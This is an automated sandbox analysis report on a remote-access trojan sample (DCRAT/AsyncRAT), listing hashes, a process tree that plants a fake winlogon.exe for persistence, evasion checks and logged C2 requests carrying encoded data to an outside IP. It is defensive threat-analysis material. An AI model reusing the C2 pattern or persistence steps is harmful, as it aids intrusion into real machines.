Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 24, 2021, 12:02 p.m.	Aug. 24, 2021, 12:04 p.m.

Size	493.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`e8317caac6568f4d37d8535a1e56ad29`
SHA256	`905fc6297517e940e073d09037ea044f2ba0ecf95f728abae8199bcc0ee2142d`
CRC32	`FA273B37`
ssdeep	`6144:7qqDLOObBf5tUgvk+HyxcQFcUdMOMJa1DHjzCytSi2OFbJKnblNGaN+SZxh8D5m5:2qnOO9BtqxcwdhrjzzcOlWkSZ3y5UB`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check Is_DotNET_EXE - (no description) IsPE32 - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT Malicious_Packer_Zero - Malicious Packer

DCRAT.exe "C:\Users\test22\AppData\Local\Temp\DCRAT.exe"
2508
- cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\y2c07uXShI.bat"
  108
  - chcp.com chcp 65001
    1512
  - w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    1696
  - DCRAT.exe "C:\Users\test22\AppData\Local\Temp\DCRAT.exe"
    2536
    - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\eoyVb9BqpK.bat"
      2744
      - chcp.com chcp 65001
        2732
      - w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        2132
      - winlogon.exe "C:\Users\test22\시작 메뉴\winlogon.exe"
        2816

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
52.158.47.4	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (32 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 11:56 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 24, 2021, 12:02 p.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 12:02 p.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 11:55 a.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 11:55 a.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 11:56 a.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 11:56 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 24, 2021, 11:55 a.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 24, 2021, 11:55 a.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1
WriteConsoleW Aug. 24, 2021, 11:56 a.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 24, 2021, 11:56 a.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 24, 2021, 12:02 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 24, 2021, 11:56 a.m.	stacktrace: 0x7fe92b3cb69 0x7fe92b346f0 mscorlib+0x4ef8a5 @ 0x7fef10ef8a5 mscorlib+0x4ef609 @ 0x7fef10ef609 mscorlib+0x4ef5c7 @ 0x7fef10ef5c7 mscorlib+0x502d21 @ 0x7fef1102d21 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef21cf713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef21cf242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef21cf30b NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef2396291 DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef2276d80 DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef2276d0e DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef2276c85 DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef2276dbb NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef2396175 StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef23066ae BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76dd652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7738c521 exception.instruction_r: 80 38 00 48 8b 4d 08 e8 4b a0 4b 5e 48 89 45 40 exception.instruction: cmp byte ptr [rax], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe92b3cb69 registers.r14: 0 registers.r15: 0 registers.rcx: 477819336 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 477821744 registers.r11: 477816672 registers.r8: 4 registers.r9: 0 registers.rdx: 39445008 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 24, 2021, 11:56 a.m.

stacktrace:

0x7fe92b3cb69
0x7fe92b346f0
mscorlib+0x4ef8a5 @ 0x7fef10ef8a5
mscorlib+0x4ef609 @ 0x7fef10ef609
mscorlib+0x4ef5c7 @ 0x7fef10ef5c7
mscorlib+0x502d21 @ 0x7fef1102d21
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef21cf713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef21cf242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef21cf30b
NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef2396291
DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef2276d80
DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef2276d0e
DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef2276c85
DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef2276dbb
NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef2396175
StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef23066ae
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76dd652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7738c521

exception.instruction_r: 80 38 00 48 8b 4d 08 e8 4b a0 4b 5e 48 89 45 40
exception.instruction: cmp byte ptr [rax], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe92b3cb69
registers.r14: 0
registers.r15: 0
registers.rcx: 477819336
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 477821744
registers.r11: 477816672
registers.r8: 4
registers.r9: 0
registers.rdx: 39445008
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://52.158.47.4/javascriptPollhttpLongpoll.php?gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC&eeba483f778911903cf941b68c630bd5=c6f9f06b86c5fe1279ff41ef4bf3f710&85f5986082198b606d527e0650b5ef02=QNjhTO4Q2NiJWMjRWO1IjYwIjM5ADNzQWMiVWNxUjNxIzMmJmY3QGO&gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC
suspicious_features	Connection to IP address				suspicious_request	GET http://52.158.47.4/javascriptPollhttpLongpoll.php?gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC&7f85f2c144b70ea263aa66e5a581cc10=AOzAjZ4cjZ1cTM2UjYyMmY4gTNjhTMyQWOlZWMmBTZlZmZlZmZzkjN0AjNycDO0EzMyIDM2ATO&85f5986082198b606d527e0650b5ef02=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&203c937cd11a470beeb4818efaf5745a=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiEjY3IzMiJTMlRGO5Q2YwATZmZGZyMjMlBjNzQ2Y0gjYiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiMmZmRzYwEzM1cTM3UGM4ADO3EDMkVmM3gTZxkTNhNGOis3W&15c8a6031aa36409a7e96bf6d99174e8=QX9JiI6IiYzETYzMjZzUDN5AjZ3Y2YlBDNlFmZmVTOmRDZ2YzYxICLiADNlRjN5UTYkNmNhZDZ5QjNkNzYmZzMiNWOhNjY3EmN3U2N4UjYhVmI6ISMidjMzImMxUGZ4kDZjBDMlZmZkJzMyUGM2MDZjRDOiJCLiUDMmVjM3QTNwcTZlVDOjRjMjRTZwcjMmBjNzYWNmNGNmJTY3QGOycjI6IyYmZGNjBTMzUzNxcTZwgDM4cTMwQWZycDOlFTO1E2Y4Iyes0nI5oUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSTdVavpWS1x2VitmRwMGcKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJNVT3F1RiBnStlkNJlnUCJFbJNXSDRGcKVUSwkFRJ9kQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlWRXpVe5IzUnd2RkFTOyU1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMl2aE9EeFpGTzkEVNNXSU10dVpGTz0kaJZTS5lld41WSzlUaVxkSp9Uar52YwUzVkZnTtl0cJNkYxkzVaRlSp9Ua0IjYwR2ValnSDxUaVNjW0V0Rj5WNyIGVKl2TptGSkBnTtl0cJNUTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETpVkaMBDND5UavpWS5ZVbWlnVtRWeWJTVpdXaJZDawI1dnpGT5F0QRdWVGVFRCNUT3FFRPRXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETplURJdXQTx0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiI2MxE2MzY2M1QTOwY2NmNWZwQTZhZmZ1kjZ0QmN2MWMiwiIkBjYhNDOkFmY4UDZ1Y2YlRzM3EjZ5cDMxgzYhRTNhhTYxEWYxYTZwIiOiEjY3IzMiJTMlRGO5Q2YwATZmZGZyMjMlBjNzQ2Y0gjYiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiMmZmRzYwEzM1cTM3UGM4ADO3EDMkVmM3gTZxkTNhNGOis3W

Performs some HTTP requests (2 events)

request

GET http://52.158.47.4/javascriptPollhttpLongpoll.php?gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC&eeba483f778911903cf941b68c630bd5=c6f9f06b86c5fe1279ff41ef4bf3f710&85f5986082198b606d527e0650b5ef02=QNjhTO4Q2NiJWMjRWO1IjYwIjM5ADNzQWMiVWNxUjNxIzMmJmY3QGO&gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC

request

GET http://52.158.47.4/javascriptPollhttpLongpoll.php?gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC&7f85f2c144b70ea263aa66e5a581cc10=AOzAjZ4cjZ1cTM2UjYyMmY4gTNjhTMyQWOlZWMmBTZlZmZlZmZzkjN0AjNycDO0EzMyIDM2ATO&85f5986082198b606d527e0650b5ef02=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&203c937cd11a470beeb4818efaf5745a=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiEjY3IzMiJTMlRGO5Q2YwATZmZGZyMjMlBjNzQ2Y0gjYiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiMmZmRzYwEzM1cTM3UGM4ADO3EDMkVmM3gTZxkTNhNGOis3W&15c8a6031aa36409a7e96bf6d99174e8=QX9JiI6IiYzETYzMjZzUDN5AjZ3Y2YlBDNlFmZmVTOmRDZ2YzYxICLiADNlRjN5UTYkNmNhZDZ5QjNkNzYmZzMiNWOhNjY3EmN3U2N4UjYhVmI6ISMidjMzImMxUGZ4kDZjBDMlZmZkJzMyUGM2MDZjRDOiJCLiUDMmVjM3QTNwcTZlVDOjRjMjRTZwcjMmBjNzYWNmNGNmJTY3QGOycjI6IyYmZGNjBTMzUzNxcTZwgDM4cTMwQWZycDOlFTO1E2Y4Iyes0nI5oUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSTdVavpWS1x2VitmRwMGcKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJNVT3F1RiBnStlkNJlnUCJFbJNXSDRGcKVUSwkFRJ9kQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlWRXpVe5IzUnd2RkFTOyU1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMl2aE9EeFpGTzkEVNNXSU10dVpGTz0kaJZTS5lld41WSzlUaVxkSp9Uar52YwUzVkZnTtl0cJNkYxkzVaRlSp9Ua0IjYwR2ValnSDxUaVNjW0V0Rj5WNyIGVKl2TptGSkBnTtl0cJNUTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETpVkaMBDND5UavpWS5ZVbWlnVtRWeWJTVpdXaJZDawI1dnpGT5F0QRdWVGVFRCNUT3FFRPRXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETplURJdXQTx0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiI2MxE2MzY2M1QTOwY2NmNWZwQTZhZmZ1kjZ0QmN2MWMiwiIkBjYhNDOkFmY4UDZ1Y2YlRzM3EjZ5cDMxgzYhRTNhhTYxEWYxYTZwIiOiEjY3IzMiJTMlRGO5Q2YwATZmZGZyMjMlBjNzQ2Y0gjYiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiMmZmRzYwEzM1cTM3UGM4ADO3EDMkVmM3gTZxkTNhNGOis3W

Allocates read-write-execute memory (usually to unpack itself) (50 out of 216 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000640000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000006e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef293b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000cf0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000e70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef22a4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
